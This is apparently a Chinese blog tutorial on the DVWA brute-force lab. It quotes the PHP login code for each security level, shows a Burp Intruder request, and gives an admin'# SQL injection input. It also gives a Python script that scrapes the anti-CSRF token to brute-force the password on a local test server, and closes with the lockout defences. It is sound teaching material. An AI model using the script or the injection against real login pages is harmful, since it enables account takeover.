DVWA學習之Brute Force
BurpSuite-Intruder筆記
Burp intruder是一個強大的工具,用於自動對Web應用程序自定義的攻擊。它能夠用來自動執行全部類型的任務您的測試過程當中可能出現的
模塊說明
- Target 用於配置目標服務器進行攻擊的詳細信息
- Positions 設置Payloads的插入點以及攻擊類型(攻擊模式)
- Payloads 設置payload,配置字典
- Opetions 此選項卡包含了request headers,request engine,attack results ,grep match,grep_extrack,grep payloads和redirections。你能夠發動攻擊以前,在主要Intruder的UI上編輯這些選項,大部分設置也能夠在攻擊時對已在運行的窗口進行修改
Brute Force過關
Low
常規爆破
- 使用attack type爲
sniper - payload positions
GET /vulnerabilities/brute/?username=admin&password=§s§&Login=Login HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: http://127.0.0.1/vulnerabilities/brute/?username=admin&password=password&Login=Login Connection: close Cookie: PHPSESSID=jabf5chqkj7mlcv86sf7l6r131; security=low Upgrade-Insecure-Requests: 1
- 爆破結果
以length排序,發現密碼爲password
html
源碼分析
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Get username
$user = $_GET[ 'username' ];
// Get password
$pass = $_GET[ 'password' ];
$pass = md5( $pass );
// Check the database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
if( $result && mysql_num_rows( $result ) == 1 ) {
// Get users details
$avatar = mysql_result( $result, 0, "avatar" );
// Login successful
echo "<p>Welcome to the password protected area {$user}</p>";
echo "<img src=\"{$avatar}\" />";
}
else {
// Login failed
echo "<pre><br />Username and/or password incorrect.</pre>";
}
mysql_close();
}
?>
-
if( isset( $_GET[ 'Login' ] ) )能夠看到,服務器只是驗證了參數Login是否被設置(isset函數在php中用來檢測變量是否設置,該函數返回的是布爾類型的值,即true/false),沒有任何的防爆破機制; - 由
$pass = md5( $pass );可知程序對輸入的密碼作了md5轉換,所以不能注入攻擊。可是由$user = $_GET[ 'username' ];和查詢語句$query = "SELECT * FROMusersWHERE user = '$user' AND password = '$pass';";可知,用戶輸入Username:處存在SQL注入。 - 用戶名輸入
admin'#獲得:
Medium
常規爆破
可爆破出密碼,速度很慢mysql
源碼分析
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Sanitise username input
$user = $_GET[ 'username' ];
$user = mysql_real_escape_string( $user );
// Sanitise password input
$pass = $_GET[ 'password' ];
$pass = mysql_real_escape_string( $pass );
$pass = md5( $pass );
// Check the database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
if( $result && mysql_num_rows( $result ) == 1 ) {
// Get users details
$avatar = mysql_result( $result, 0, "avatar" );
// Login successful
echo "<p>Welcome to the password protected area {$user}</p>";
echo "<img src=\"{$avatar}\" />";
}
else {
// Login failed
sleep( 2 );
echo "<pre><br />Username and/or password incorrect.</pre>";
}
mysql_close();
}
?>
-
sleep( 2 );使得爆破;速度很慢,但仍然沒有防爆破機制; - 對比low的源碼在用戶輸入處加入
mysql_real_escape_string函數作處理,該函數會對字符串中的特殊符號(x00,n,r,,’,」,x1a)進行轉義,基本上可以抵禦sql注入攻擊(MySQL5.5.37如下版本若是設置編碼爲GBK,可以構造編碼繞過mysql_real_escape_string 對單引號的轉義)PHP字符編碼繞過漏洞總結
high
常規爆破
失敗sql
源碼分析
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Sanitise username input
$user = $_GET[ 'username' ];
$user = stripslashes( $user );
$user = mysql_real_escape_string( $user );
// Sanitise password input
$pass = $_GET[ 'password' ];
$pass = stripslashes( $pass );
$pass = mysql_real_escape_string( $pass );
$pass = md5( $pass );
// Check database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
if( $result && mysql_num_rows( $result ) == 1 ) {
// Get users details
$avatar = mysql_result( $result, 0, "avatar" );
// Login successful
echo "<p>Welcome to the password protected area {$user}</p>";
echo "<img src=\"{$avatar}\" />";
}
else {
// Login failed
sleep( rand( 0, 3 ) );
echo "<pre><br />Username and/or password incorrect.</pre>";
}
mysql_close();
}
// Generate Anti-CSRF token
generateSessionToken();
?>
-
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );加入了Anti-CSRFtoken,使得burp suite爆破失效;
正常登陸分析:
- 觀察登陸提交的URL
http://127.0.0.1/vulnerabilities/brute/?username=admin&password=password&Login=Login&user_token=5b8ebd4aed00f92040bf08462ebb774d
發現較以前多提交了一個參數user_token,尋找user_token出處;安全
- 查看
http://127.0.0.1/vulnerabilities/brute/源代碼用戶登陸處:
<div class="body_padded">
<h1>Vulnerability: Brute Force</h1>
<div class="vulnerable_code_area">
<h2>Login</h2>
<form action="#" method="GET">
Username:<br />
<input type="text" name="username"><br />
Password:<br />
<input type="password" AUTOCOMPLETE="off" name="password"><br />
<br />
<input type="submit" value="Login" name="Login">
<input type='hidden' name='user_token' value='a332f3f8636b93c53072789dabf685dd' />
</form>
<p>Welcome to the password protected area admin</p><img src="http://127.0.0.1/hackable/users/admin.jpg" />
</div>
發現user_token的值;服務器
- 推測登陸流程:
先從提交表單處獲取user_token的值,在提交表單時加入user_token參數,服務器端驗證user_token的值後再驗證登陸是否成功。session
正確爆破姿式
使用Python腳本爆破(BeautifulSoup + urllib.request)app
- 源碼使用
if( isset( $_GET[ 'Login' ] ) )判斷,未對登陸失敗次數作限制,所以仍然能夠爆破密碼; - 使用BeautifulSoup庫從每次請求的頁面中抓取user_token的值,帶入下一次get請求的
user_token中。
from bs4 import BeautifulSoup
import urllib.request
import urllib.error
header = {
"Host": "127.0.0.1",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Referer": "http://127.0.0.1/vulnerabilities/brute/",
"Connection": "close",
"Cookie": "PHPSESSID=jabf5chqkj7mlcv86sf7l6r131; security=high"
}
url = "http://127.0.0.1/vulnerabilities/brute/"
def get_user_token(url, header):
try:
req = urllib.request.Request(url, headers=header)
res = urllib.request.urlopen(req)
except urllib.error.URLError as e:
if hasattr(e, "code"):
print(e.code)
if hasattr(e, "reason"):
print(e.reason)
except Exception as e:
print(e)
else:
soup = BeautifulSoup(res.read(), "html.parser")
user_token = soup.select('input[type="hidden"]')
return user_token[0].get('value')
def brute_req(next_url):
# next_url = 'http://127.0.0.1/vulnerabilities/brute/?username=admin&password={}&Login=Login&user_token={}'.format(password, user_token)
try:
req = urllib.request.Request(next_url, headers=header)
res = urllib.request.urlopen(req)
except urllib.error.URLError as e:
if hasattr(e, "code"):
print(e.code)
if hasattr(e, "reason"):
print(e.reason)
except Exception as e:
print(e)
else:
print(str(res.code) + " ", end='')
print(len(res.read()))
if __name__ == '__main__':
with open('password.txt', 'r') as fd:
password_list = fd.read().split('\n')
user_token = get_user_token(url, header)
for password in password_list:
next_url = 'http://127.0.0.1/vulnerabilities/brute/?username=admin&password={}&Login=Login&user_token={}'.format(
password, user_token)
print(password + ":", end="")
brute_req(next_url=next_url)
user_token = get_user_token(next_url, header)
運行結果片斷:函數
roots:200 5031 test:200 5031 test1:200 5031 test123:200 5031 test2:200 5031 password:200 5085 aaaAAA111:200 5031 888888:200 5031 88888888:200 5031 000000:200 5031 00000000:200 5031 111111:200 5031 11111111:200 5031 aaaaaa:200 5031 aaaaaaaa:200 5031 135246:200 5031 135246789:200 5031 123456:200 5031 654321:200 5031 12345:200 5031 54321:200 5031 123456789:200 5031 1234567890:200 5031 123qwe:200 5031
發現password密碼的返回長度與其餘不一樣,得到密碼,爆破成功。工具
Impossible
源碼分析
<?php
if( isset( $_POST[ 'Login' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Sanitise username input
$user = $_POST[ 'username' ];
$user = stripslashes( $user );
$user = mysql_real_escape_string( $user );
// Sanitise password input
$pass = $_POST[ 'password' ];
$pass = stripslashes( $pass );
$pass = mysql_real_escape_string( $pass );
$pass = md5( $pass );
// Default values
$total_failed_login = 3;
$lockout_time = 15;
$account_locked = false;
// Check the database (Check user information)
$data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
$row = $data->fetch();
// Check to see if the user has been locked out.
if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) {
// User locked out. Note, using this method would allow for user enumeration!
//echo "<pre><br />This account has been locked due to too many incorrect logins.</pre>";
// Calculate when the user would be allowed to login again
$last_login = $row[ 'last_login' ];
$last_login = strtotime( $last_login );
$timeout = strtotime( "{$last_login} +{$lockout_time} minutes" );
$timenow = strtotime( "now" );
// Check to see if enough time has passed, if it hasn't locked the account
if( $timenow > $timeout )
$account_locked = true;
}
// Check the database (if username matches the password)
$data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR);
$data->bindParam( ':password', $pass, PDO::PARAM_STR );
$data->execute();
$row = $data->fetch();
// If its a valid login...
if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
// Get users details
$avatar = $row[ 'avatar' ];
$failed_login = $row[ 'failed_login' ];
$last_login = $row[ 'last_login' ];
// Login successful
echo "<p>Welcome to the password protected area <em>{$user}</em></p>";
echo "<img src=\"{$avatar}\" />";
// Had the account been locked out since last login?
if( $failed_login >= $total_failed_login ) {
echo "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>";
echo "<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>${last_login}</em>.</p>";
}
// Reset bad login count
$data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
}
else {
// Login failed
sleep( rand( 2, 4 ) );
// Give the user some feedback
echo "<pre><br />Username and/or password incorrect.<br /><br/>Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>";
// Update bad login count
$data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
}
// Set the last login time
$data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
}
// Generate Anti-CSRF token
generateSessionToken();
?>
-
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );加入了Anti-CSRFtoken; - 對登陸失敗次數作限制,防止爆破;
- 用了更爲安全的PDO(PHP Data Object)機制防護sql注入
相關文章
- 1. DVWA之Brute Force
- 2. dvwa-low-Brute Force
- 3. DVWA-Brute Force
- 4. DVWA - Brute Force (Low)
- 5. DVWA - Brute Force (high)
- 6. DVWA - Brute Force (medium)
- 7. DVWA系列Brute Force
- 8. dvwa學習-brute force(暴力破解)
- 9. DVWA-Brute Force(暴力破解)
- 10. DVWA-Brute Force(暴力破解)
- 更多相關文章...
- • 您已經學習了 XML Schema,下一步學習什麼呢? - XML Schema 教程
- • 我們已經學習了 SQL,下一步學習什麼呢? - SQL 教程
- • Tomcat學習筆記(史上最全tomcat學習筆記)
- • 適用於PHP初學者的學習線路和建議
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 字節跳動21屆秋招運營兩輪面試經驗分享
- 2. Java 3 年,25K 多嗎?
- 3. mysql安裝部署
- 4. web前端開發中父鏈和子鏈方式實現通信
- 5. 3.1.6 spark體系之分佈式計算-scala編程-scala中trait特性
- 6. dataframe2
- 7. ThinkFree在線
- 8. 在線畫圖
- 9. devtools熱部署
- 10. 編譯和鏈接
歡迎關注本站公眾號,獲取更多信息
